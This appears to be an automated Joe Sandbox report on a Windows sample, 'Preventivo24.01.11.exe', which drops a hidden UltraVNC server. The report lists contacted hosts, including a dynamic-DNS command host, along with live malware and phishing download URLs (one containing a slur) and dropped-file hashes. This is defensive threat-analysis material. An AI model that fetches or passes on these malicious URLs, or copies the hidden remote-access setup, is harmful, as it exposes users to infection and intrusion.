http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	false		high
https://www.thawte.com/cps0/	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://forum.uvnc.comvncMenu::WndProc	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	low
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://oneocsp.microe	Preventivo24.01.11.exe, 00000000.00000003.2018147463.0000000005565000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005566000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://www.advancedinstaller.com	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://www.uvnc.comhttps://forum.uvnc.comnet	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://java.sun.com/products/plugin/index.html#download	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://.jpg	shi5398.tmp.0.dr	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
184.25.164.138	unknown	United States	9498	BBIL-APBHARTIAirtelLtdIN	false
93.184.216.34	www.example.com	European Union	15133	EDGECASTUS	false
140.228.29.110	vnvariant2024.ddnsfree.com	United States	600	OARNET-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1379424
Start date and time:	2024-01-23 12:07:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	58
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Preventivo24.01.11.exe
Detection:	MAL
Classification:	mal84.rans.troj.evad.winEXE@109/76@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 61% Number of executed functions: 97 Number of non-executed functions: 140
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 72.21.81.240, 23.63.204.182, 23.22.254.206, 54.227.187.23, 52.5.13.197, 52.202.204.11, 172.64.41.3, 162.159.61.3, 23.55.62.67, 23.55.62.18, 23.47.204.8, 23.47.204.33
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, wu-bg-shim.trafficmanager.net, wu.azureedge.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:07:58	API Interceptor	3x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
93.184.216.34	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	www.example.com/download/updates.txt
	invoice.exe	Get hash	malicious	Unknown	Browse	example.com/invoice.png
	invoice.exe	Get hash	malicious	Unknown	Browse	example.com/invoice.png
	sPQFAZC1qu.exe	Get hash	malicious	Unknown	Browse	example.com/logo.png
	https://swailemmarket.com/09/me.php/?email=mkpublicitario	Get hash	malicious	Phisher	Browse	example.com/favicon.ico
	PO#300637600010.pdf.exe	Get hash	malicious	Unknown	Browse	example.com/Cpxrobfbi.bmp
	SecuriteInfo.com.Win32.PWSX-gen.25916.15292.exe	Get hash	malicious	Unknown	Browse	example.com/Ehyyhz.jpeg
140.228.29.110	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
140.228.29.110	Fatturation110124.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.example.com	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://89.190.156.10/w.sh	Get hash	malicious	Unknown	Browse	93.184.216.34
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://93.123.85.79/fuckjewishpeople.x86	Get hash	malicious	Gafgyt, Mirai	Browse	93.184.216.34
	http://84.54.51.74/SBIDIOT/x86	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://45.95.147.236/download/redtail.x86_64	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://114.67.217.170/bins/sora.x86	Get hash	malicious	Unknown	Browse	93.184.216.34
	http://31.184.194.114/404	Get hash	malicious	Unknown	Browse	93.184.216.34

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EDGECASTUS	https://spectrumpaint.atlassian.net/wiki/external/ZTZiNjUxYzcwM2FjNGI0OGE1NWMwMzVkMmYwMDBlYmM	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://r20.rs6.net/tn.jsp?f=001YH-7ZZwZf7vdTuy8dA-Lrgcj-RWTq3YSoVohjMwglnhROJ-nqA7TO7-KdBpZBl6RaLh5o0DSlL3SoDP7qpv4LsjHVxt3Zzvw1KN163kNMN-iXLg07xWzu4hMlToFknIyjffPrubFycvA3YBCe7UEIw==&c=Yks7_GJ0450wjzHe24SAzoXRzl2-u4T4FpfxJamuYFeWFIrqepMI7Q==&ch=WTLp04fpQb3-V9z92yhgE0Y-Y6wimMaEQRH3SzFk5jbBN1xPF_QeGA==	Get hash	malicious	Unknown	Browse	72.21.91.66
	https://bafkreihnbfu4b55y5i6veo6i34vpad7c6uzbf5dqnxud5e2udieuscrgnm.ipfs.cf-ipfs.com/	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://clickeuc1.actmkt.com//s/052-0d3f28ba-446f-45fc-aaa8-4c1728edb7be?enr=naahiaduabyaa4yahiac6abpabsqa4qaneaggadbaa2aanaafyadaabqaayaa5yamuageadiabxqa4yaoqagcadqabyaalqammag6adnaaxqa3yao4agcadbaaxqa7aamqagyadbabzaa5iamuadkabuaayqaqaam4ag2adbabuqa3aafyaggadpabwqa7aagaahyad4aayaaniagiac2abqabsaamyamyadeabyabraayiafuadiabuaa3aazqafuadiabvabtaayyafuagcadbabqqaoaafuadiaddaayqanyagiadqadfabsaayqag4ageadfab6aamaaguadsabnabtaaoiagmagiabqabtaamiagqac2abtaa2qaziamyac2abuabsqaoiamuac2abzaa2aazqagqac2abraayqamyamyadoabvaa3aazaamqadsabrabqqa7aagaadaabraawqazqaguadaabrabtaazaagmadcabnaa4qanyageadqabnaa2aaniaheadoabnaa4qamyamuadeabnaa3aanqamyaggabwabtaayqamuagiadgaazqamiapqahyacbab6aa===#Y2lyby5zb2FyZXNAbm92b2JhbmNvLnB0&xcpShlR	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	http://mailing-stats.clubview.co.uk/ls/click?upn=JGTDuCHFcCqat3Th7oew44Ossg-2F2NTVg-2BtYj7w1DoMH5YmBe3nFFnuJtHf-2BnYwqFV20JUmqqJfg-2FmMpr4r23ZokFQC7mKC3gGQrz9PVyBwY-3DgP2X_ycFUGOmj-2BzZRMCTo5aRQsS6Jkwa-2Bnfox4zR-2BIEsEWER5kKFE9-2B6WqMFMwjupMYIg47qAuiflHf29TpR-2Bi-2F2mpiCBhllU0f8DN7APb4-2BqWtgh6hvaMQpGLpKUcO0SpRuVoG1yfmXGgWnDxA6cKh7QHvB7k0W6xAQXsN1TOZ8sQxZocfk0XSJvtCZMWElpBVjmRa374HG9YdZqMioBmLh3gF0KvEd5YaRKrqX-2FZlEGidk-3D	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	152.195.19.97
	Bank_Verification_Form.html	Get hash	malicious	Unknown	Browse	152.199.4.33
	https://link.mail.beehiiv.com/ss/c/PueTBZLlh8npO1epiTd7L1qK7CpRRWYkaLDcsmBux7Yam39KuLLNtl2CtcuJF0W6nDvOaHFjuVJqpI778hwLFcCSp0xP9lBQd1QwXw9sjsZpVYGzcacqb2r93Fs_qwmI5Crcdaw4hELdJtUMeK51Pw/436/YGLbNQWXRWqqEnC5oYBqNw/h6/WcxpuAi4FcomQTdzggxEu522j_jrrOITkmIHaWx4Wxc#/?email=kim.ansell@proampac.com	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	You've received a Voice-Messge from Emmitsburg Maryland on January 19 2024 at 195401 PM.msg	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
OARNET-ASUS	8iolWfLe1f.elf	Get hash	malicious	Unknown	Browse	130.110.238.104
	2XcXiCaqz1.elf	Get hash	malicious	Mirai	Browse	206.244.62.50
	huhu.arm5.elf	Get hash	malicious	Mirai	Browse	138.30.225.135
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	140.228.29.110
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse	140.228.29.110
	huhu.arm5.elf	Get hash	malicious	Mirai	Browse	157.134.214.94
	skyljne.arm7.elf	Get hash	malicious	Mirai	Browse	136.227.248.206
	ZMuJrxk7ff.elf	Get hash	malicious	Unknown	Browse	140.229.52.187
	skyljne.x86.elf	Get hash	malicious	Mirai	Browse	140.222.172.141
	k7t8NWviLo.elf	Get hash	malicious	Mirai	Browse	140.222.172.153
BBIL-APBHARTIAirtelLtdIN	https://teams-dashboard-review-classic-interface-mi-cro.softr.app/	Get hash	malicious	Unknown	Browse	23.209.188.143
	rp.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	23.209.188.135
	d6REj8J3y9.elf	Get hash	malicious	Mirai	Browse	184.26.54.96
	r1kArkKGjW.exe	Get hash	malicious	Sality	Browse	122.180.142.130
	G11za2w6Na.elf	Get hash	malicious	Mirai	Browse	122.186.4.230
	xkurXCPbpb.elf	Get hash	malicious	Mirai	Browse	125.18.248.76
	Yy6UdBIY7T.elf	Get hash	malicious	Mirai	Browse	116.119.63.105
	skyljne.arm5.elf	Get hash	malicious	Mirai	Browse	122.181.70.25
	skyljne.x86_64.elf	Get hash	malicious	Mirai	Browse	125.23.89.188
	rIStusmUkm.elf	Get hash	malicious	Mirai	Browse	182.74.13.48

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MSI54A3.tmp	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\MSI5406.tmp	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	Fatturation110124.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	1tuL3R5svT.exe	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Games\IDD.txt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.7219280948873625
Encrypted:	false
SSDEEP:	3:E90Fy:E90c
MD5:	31DDADD9B96A4D473D31B90CE3299714
SHA1:	56A3FF64F67777786CEA32CA80830E21871698A2
SHA-256:	568C81668B7D1ABB65FA1578FC92C5C0C69066442744EE8D846EEACA15916644
SHA-512:	22F8F0036610190587C3F1CBF684BAFF9EAB5762AB50C601CCF2570939D534C070E8D7E24FF11390D5958E85B8703E983E06EB199F547C4F1574A84768B765BE
Malicious:	false
Preview:	5402254 ..

C:\Games\WinVNC.log

Download File

Process:	C:\Games\taskhost.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1550
Entropy (8bit):	4.925489149578176
Encrypted:	false
SSDEEP:	48:H3LTI/K0HyJaARp+Sj7te9uta7HkshN0Mb5uwMx6MLx:Hgb9SVeWa4K0Lx
MD5:	673677EBA7DC23548954F10C4A5F00A2
SHA1:	2D444A5736F8C20B47F29AD091A47C4B347549A7
SHA-256:	BDA543691859B8485B83146C52F483483F64782284071F0323DF917B4AD44A3F
SHA-512:	09DB969EAF2B42190C2341AE730306865451D46DB05981B68206B66D8B66060195010D2F7E1E889DD8517B4091AF7C87A4866563E5C45DDF7C22820EDEA7028D
Malicious:	false
Preview:	Tue Jan 23 12:08:12 2024.WinVNCAppMain : WinVNCAPPMain-----Application started.WinVNCAppMain : server created ok.imp_desktop_thread : OpenInputdesktop OK. --The parameter is incorrect...imp_desktop_thread : SelectHDESK to Default (370) from 118.imp_desktop_thread : Username user .vncMenu::vncMenu : vncmenu(server).Tue Jan 23 12:08:13 2024.vncServer::SetAuthHosts : authhosts cleared.vncServer::EnableConnections : SockConnect 0.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : trying port number 5900.Tue Jan 23 12:08:15 2024.VSocket::Close : closing socket.vncServer::EnableConnections : SockConnect Done 1.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : SockConnect 1.vncSockConnectThread::run_undetached : started socket connection thread. --The parameter is incorrect...vncHTTPConnectThread::run_undetached : started HTTP server thread. --The parameter is incorrect...Tue Jan 23 12:08:16 2024.imp_desktop_thread : PostAddNewClient IIIII

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.172459972408181
Encrypted:	false
SSDEEP:	6:HMWpPv8LYv3+q2P92nKuAl9OmbnIFUt8+MWpPv8LXBXZmw++MWpPv8LXB3VkwO9f:H5PfvOv4HAahFUt8+5PYBX/++5PYBF5G
MD5:	56892D4F8673196CCC5ACF0B1DB91F19
SHA1:	5750A0E2EE276023C044ACF8D0E8BBF2CA715CA3
SHA-256:	1A91CFC11373335420ACBF04DA0016677FCCFB2AAC7EF3EFC932219F27FB9815
SHA-512:	965BD455F4438E3140B5A532E7D656F1F7C15E6AF72A4313E8A26F313A0A31420BC1506DBEF7820A1D2B83F6DB995B007B1780F677286718E8E5606A8468193E
Malicious:	false
Preview:	2024/01/23-12:08:03.070 6f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:08:03.071 6f8 Recovering log #3.2024/01/23-12:08:03.071 6f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.172459972408181
Encrypted:	false
SSDEEP:	6:HMWpPv8LYv3+q2P92nKuAl9OmbnIFUt8+MWpPv8LXBXZmw++MWpPv8LXB3VkwO9f:H5PfvOv4HAahFUt8+5PYBX/++5PYBF5G
MD5:	56892D4F8673196CCC5ACF0B1DB91F19
SHA1:	5750A0E2EE276023C044ACF8D0E8BBF2CA715CA3
SHA-256:	1A91CFC11373335420ACBF04DA0016677FCCFB2AAC7EF3EFC932219F27FB9815
SHA-512:	965BD455F4438E3140B5A532E7D656F1F7C15E6AF72A4313E8A26F313A0A31420BC1506DBEF7820A1D2B83F6DB995B007B1780F677286718E8E5606A8468193E
Malicious:	false
Preview:	2024/01/23-12:08:03.070 6f8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:08:03.071 6f8 Recovering log #3.2024/01/23-12:08:03.071 6f8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.105253045193253
Encrypted:	false
SSDEEP:	6:HMWpPv8LlIIq2P92nKuAl9Ombzo2jMGIFUt8+MWpPv8LXG0Zmw++MWpPv8LXG0kv:H5PIIIv4HAa8uFUt8+5Pv0/++5Pv05Lg
MD5:	AFADAE0FAD8EEB72D8483D17E0E67A2F
SHA1:	54D6061E3CECB6A90D14721C982613EE96052A60
SHA-256:	4FDF2C90D07BB7C7D8560900A9BBC74CFC02DA396ED1BBBB7C58C51FC8DEC57D
SHA-512:	85108752191E8B707D9205C8F675FAB7643ADA8C8540E44868F90E9C7F7E99FC87FE05DFAC377A3FB36410BE9FBA4CF472766C4120BA2C3C17D604F957607375
Malicious:	false
Preview:	2024/01/23-12:08:03.099 1ca4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:08:03.102 1ca4 Recovering log #3.2024/01/23-12:08:03.102 1ca4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.105253045193253
Encrypted:	false
SSDEEP:	6:HMWpPv8LlIIq2P92nKuAl9Ombzo2jMGIFUt8+MWpPv8LXG0Zmw++MWpPv8LXG0kv:H5PIIIv4HAa8uFUt8+5Pv0/++5Pv05Lg
MD5:	AFADAE0FAD8EEB72D8483D17E0E67A2F
SHA1:	54D6061E3CECB6A90D14721C982613EE96052A60
SHA-256:	4FDF2C90D07BB7C7D8560900A9BBC74CFC02DA396ED1BBBB7C58C51FC8DEC57D
SHA-512:	85108752191E8B707D9205C8F675FAB7643ADA8C8540E44868F90E9C7F7E99FC87FE05DFAC377A3FB36410BE9FBA4CF472766C4120BA2C3C17D604F957607375
Malicious:	false
Preview:	2024/01/23-12:08:03.099 1ca4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/01/23-12:08:03.102 1ca4 Recovering log #3.2024/01/23-12:08:03.102 1ca4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\22dc0223-1fa2-493b-9b30-3ddc1f4be2d9.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	508
Entropy (8bit):	5.048337357207831
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqZQ7HXhsBdOg2HLcaq3QYiubxnP7E4T3OF+:Y2sRdsbCdMHy3QYhbxP7nbI+
MD5:	837705F8CD53EECE5BF9AAF633672DBA
SHA1:	89945DA469353684A1FFF102722875AC8FF39276
SHA-256:	090D1C3BA53AD49487A45FC54737AD9DF4F452BB8A9A992637FA66AB4AF63EAA
SHA-512:	38B774CCD2E37190512184DB573E9EB2B67D183BDBC1A286DEE783D1173CE5295C8F90C3001FA25E62D372A196F396463D6FA95BA97446F1CD0DD11EDA602A9B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568094945644","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119154},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.048337357207831
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqZQ7HXhsBdOg2HLcaq3QYiubxnP7E4T3OF+:Y2sRdsbCdMHy3QYhbxP7nbI+
MD5:	837705F8CD53EECE5BF9AAF633672DBA
SHA1:	89945DA469353684A1FFF102722875AC8FF39276
SHA-256:	090D1C3BA53AD49487A45FC54737AD9DF4F452BB8A9A992637FA66AB4AF63EAA
SHA-512:	38B774CCD2E37190512184DB573E9EB2B67D183BDBC1A286DEE783D1173CE5295C8F90C3001FA25E62D372A196F396463D6FA95BA97446F1CD0DD11EDA602A9B
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13350568094945644","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":119154},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4099
Entropy (8bit):	5.233427839276561
Encrypted:	false
SSDEEP:	96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU3fYL4bX:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLy
MD5:	91BCEC5C649F5F44A38E359074C3250D
SHA1:	982B29CB30D7DB1F3202F17812B2F7B2A10A23EF
SHA-256:	EE7E091FB794A936A731BC94BA4D0FD7F0B7CCEC36D8013A89A68583B40FBB08
SHA-512:	1C6C060893D607308BD830D10E09B649EA64D96E7C40DE40999C1D2E33A2EA78212F8C8A1EAD824E90B4AEFB85383DC6A8DDDFCBACE1DB7173A92C5A621F62A9
Malicious:	false
Preview:	*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.\|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.157295673012097
Encrypted:	false
SSDEEP:	6:HMWpPv8LzIq2P92nKuAl9OmbzNMxIFUt8+MWpPv8LxcZmw++MWpPv8LRkwO92nKA:H5PRv4HAa8jFUt8+5PD/++5Pa5LHAa8E
MD5:	7C5A8F20BB8DA645BF358F25B274AC89
SHA1:	EF7B48A9819B19722DAC73F2F9C8D3E5FC9BD1B0
SHA-256:	451B138632FFE7676FBB294B2325BF0DDE423F9A8DF1DC0791D94914A72A6CC2
SHA-512:	44F7EAE15BC19D4ED5D4DBDE12F47894C377F8611C1D8A30AE8230E97F8D3D99A860085A011F457132C7C23AD72784545BAF26511EE6283240BEC1C37592F0FA
Malicious:	false
Preview:	2024/01/23-12:08:03.366 1ca4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:08:03.367 1ca4 Recovering log #3.2024/01/23-12:08:03.368 1ca4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.157295673012097
Encrypted:	false
